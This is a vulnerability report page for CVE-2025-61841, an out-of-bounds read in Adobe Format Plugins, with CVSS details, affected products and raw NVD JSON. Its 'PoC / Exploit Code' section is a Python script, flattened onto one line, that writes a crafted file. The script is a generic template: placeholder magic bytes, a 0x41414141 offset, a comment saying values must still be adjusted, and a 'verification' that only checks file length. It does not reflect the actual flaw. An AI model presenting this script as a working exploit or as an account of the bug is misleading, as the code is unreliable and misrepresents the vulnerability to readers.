Security Vulnerability Report
中文
CVE-2025-61841 CVSS 5.5 MEDIUM

CVE-2025-61841

Published: 2025-11-11 19:15:36
Last Modified: 2025-11-13 15:19:26

Description

Format Plugins versions 1.1.1 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to access sensitive memory information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:format_plugins:-:*:*:*:*:*:*:* - VULNERABLE
Adobe Format Plugins <= 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61841 PoC - Adobe Format Plugins Out-of-bounds Read # This PoC demonstrates the vulnerability in a controlled environment import struct import os def create_malicious_format_file(): """ Create a malicious format file that triggers out-of-bounds read in Adobe Format Plugins <= 1.1.1 """ # File header with crafted data to trigger OOB read header = b'FORMAT' # Magic bytes header += struct.pack('<I', 0xFFFF) # Version field header += struct.pack('<I', 0x41414141) # Crafted offset header += struct.pack('<I', 0x100) # Size field # Payload designed to cause boundary violation # Adjust values based on specific vulnerability analysis payload = b'\x41' * 512 # Padding payload += b'\x00' * 256 # Trigger data # File metadata metadata = b'\xFF' * 128 # Malformed metadata malicious_file = header + payload + metadata output_file = 'malicious_cve_2025_61841.format' with open(output_file, 'wb') as f: f.write(malicious_file) print(f'[+] Malicious file created: {output_file}') print(f'[+] File size: {len(malicious_file)} bytes') return output_file def verify_vulnerability(target_file): """ Verify if target file can trigger the vulnerability """ print(f'[*] Analyzing file: {target_file}') try: with open(target_file, 'rb') as f: data = f.read() print(f'[*] File loaded successfully') print(f'[*] File size: {len(data)} bytes') # Check for potential OOB trigger patterns if len(data) > 0x200: print('[+] Potential OOB trigger detected') return True except Exception as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': print('=' * 50) print('CVE-2025-61841 PoC - Adobe Format Plugins') print('Out-of-bounds Read Vulnerability') print('=' * 50) # Create malicious file malicious_file = create_malicious_format_file() # Verify (in real scenario, this would be tested against vulnerable version) verify_vulnerability(malicious_file) print('\n[!] Note: This PoC is for educational purposes only.') print('[!] Always test in controlled environments.')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61841", "sourceIdentifier": "[email protected]", "published": "2025-11-11T19:15:35.923", "lastModified": "2025-11-13T15:19:25.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Format Plugins versions 1.1.1 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to access sensitive memory information. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:format_plugins:-:*:*:*:*:*:*:*", "matchCriteriaId": "9FE89744-A347-4449-8733-D54CA0E25723"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/formatplugins/apsb25-114.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}